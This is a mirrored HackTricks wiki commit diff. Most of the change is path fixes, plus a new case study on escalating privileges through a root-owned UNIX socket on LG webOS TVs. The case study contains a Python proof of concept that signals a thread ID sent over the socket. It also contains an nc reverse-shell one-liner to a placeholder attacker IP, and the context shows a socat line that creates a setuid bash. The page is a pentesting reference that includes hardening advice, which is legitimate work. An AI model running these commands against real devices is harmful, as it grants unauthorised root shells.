mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1450 from HackTricks-wiki/update_LG_WebOS_TV_Path_Traversal__Authentication_Bypass__20251001_012659
LG WebOS TV Path Traversal, Authentication Bypass and Full D...
This commit is contained in:
		
						commit
						9cf95010ea
					
				| @ -1,6 +1,6 @@ | ||||
| # Mutation Testing for Solidity with Slither (slither-mutate) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| Mutation testing "tests your tests" by systematically introducing small changes (mutants) into your Solidity code and re-running your test suite. If a test fails, the mutant is killed. If the tests still pass, the mutant survives, revealing a blind spot in your test suite that line/branch coverage cannot detect. | ||||
| 
 | ||||
| @ -123,4 +123,4 @@ Guidance: Treat survivors that affect value transfers, accounting, or access con | ||||
| - [Arkis DeFi Prime Brokerage Security Review (Appendix C)](https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf) | ||||
| - [Slither (GitHub)](https://github.com/crytic/slither) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -43,6 +43,45 @@ unix  2      [ ACC ]     STREAM     LISTENING     901181   132748/python | ||||
| echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s | ||||
| ``` | ||||
| 
 | ||||
| ## Case study: Root-owned UNIX socket signal-triggered escalation (LG webOS) | ||||
| 
 | ||||
| Some privileged daemons expose a root-owned UNIX socket that accepts untrusted input and couples privileged actions to thread-IDs and signals. If the protocol lets an unprivileged client influence which native thread is targeted, you may be able to trigger a privileged code path and escalate. | ||||
| 
 | ||||
| Observed pattern: | ||||
| - Connect to a root-owned socket (e.g., /tmp/remotelogger). | ||||
| - Create a thread and obtain its native thread id (TID). | ||||
| - Send the TID (packed) plus padding as a request; receive an acknowledgement. | ||||
| - Deliver a specific signal to that TID to trigger the privileged behaviour. | ||||
| 
 | ||||
| Minimal PoC sketch: | ||||
| 
 | ||||
| ```python | ||||
| import socket, struct, os, threading, time | ||||
| # Spawn a thread so we have a TID we can signal | ||||
| th = threading.Thread(target=time.sleep, args=(600,)); th.start() | ||||
|  tid = th.native_id  # Python >=3.8 | ||||
| s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) | ||||
| s.connect("/tmp/remotelogger") | ||||
| s.sendall(struct.pack('<L', tid) + b'A'*0x80) | ||||
| s.recv(4)  # sync | ||||
| os.kill(tid, 4)  # deliver SIGILL (example from the case) | ||||
| ``` | ||||
| 
 | ||||
| To turn this into a root shell, a simple named-pipe + nc pattern can be used: | ||||
| 
 | ||||
| ```bash | ||||
| rm -f /tmp/f; mkfifo /tmp/f | ||||
| cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f | ||||
| ``` | ||||
| 
 | ||||
| Notes: | ||||
| - This class of bugs arises from trusting values derived from unprivileged client state (TIDs) and binding them to privileged signal handlers or logic. | ||||
| - Harden by enforcing credentials on the socket, validating message formats, and decoupling privileged operations from externally supplied thread identifiers. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -744,6 +744,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._ | ||||
| 
 | ||||
| <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure> | ||||
| 
 | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal) | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user